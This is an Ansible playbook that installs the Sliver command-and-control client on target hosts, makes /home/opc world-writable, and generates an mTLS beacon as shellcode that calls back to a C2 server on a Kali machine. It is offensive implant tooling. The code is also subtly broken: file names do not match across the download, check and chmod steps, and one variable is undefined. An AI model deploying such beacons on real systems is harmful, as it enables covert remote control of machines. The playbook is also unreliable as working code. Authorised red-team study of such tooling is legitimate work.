---
- name: Install and generate a Sliver beacon
  hosts: all
  become: true
  vars:
    sliver_server_ip: "" # Replace with your Kali machine's IP
    sliver_server_port: 8888 # Default Sliver C2 server port
    beacon_name: "NIKES_ON_MY_FEET_KEEP_MY_CIPHER_COMPLETE"

  tasks:
    - name: Update the package cache
      ansible.builtin.yum:
        name: "*"
        state: latest
        update_cache: yes

    - name: Install prerequisites for Sliver
      ansible.builtin.yum:
        name:
          - wget
          - curl
          - unzip
          - git
          - gcc
          - make
          - golang
        state: present

    - name: Change permissions for /home/opc/
      ansible.builtin.file:
        path: "/home/opc"
        state: directory
        mode: "0777"

    - name: Create directory /home/opc/sliver
      ansible.builtin.file:
        path: "/home/opc/sliver"
        owner: opc
        group: opc
        state: directory
        mode: "0777"

    - name: Download Sliver client via curl
      ansible.builtin.shell:
        curl -L --fail --retry 3 -o /home/opc/sliver/sliver-client \
        https://github.com/BishopFox/sliver/releases/download/v1.5.39/sliver-client_linux
      register: download_result
      retries: 3
      delay: 5
      until: download_result.rc == 0
      changed_when: download_result.rc == 0

    - name: Verify Sliver client download
      ansible.builtin.stat:
        path: "/home/opc/sliver/sliver-client_linux"
      register: sliver_file

    - name: Ensure Sliver client was downloaded
      ansible.builtin.fail:
        msg: "Sliver client download failed!"
      when: not sliver_file.stat.exists

    - name: Verify sliver client was downloaded successfully
      ansible.builtin.fail:
        msg: "Failed to download sliver client"
      when: not sliver_file.stat.exists or sliver_file.stat.size < 10000 # Ensures file is not empty

    - name: Make sliver client executable
      ansible.builtin.file:
        path: "/home/opc/sliver/sliver_client"
        mode: "0777"
        owner: opc
        group: opc

    - name: Verify Sliver client installation
      ansible.builtin.shell:
        cmd: "sliver-client --help"
      register: sliver_check
      ignore_errors: yes

    - name: Print Sliver client installation status
      ansible.builtin.debug:
        msg: "Sliver client version: {{ sliver_client_version.stdout }}"

    - name: Generate a Sliver beacon
      ansible.builtin.shell:
        cmd: |
          sliver-client --connect {{ sliver_server_ip }}:{{ sliver_server_port }} --skip-update <<EOF
          use beacon
          generate beacon --mtls {{ sliver_server_ip }}:{{ sliver_server_port }} --arch amd64 --format shellcode --name {{ beacon_name }}
          exit
          EOF
        chdir: /tmp
      register: sliver_beacon
      ignore_errors: yes

    - name: Print beacon generation output
      ansible.builtin.debug:
        msg: "{{ sliver_beacon.stdout }}"
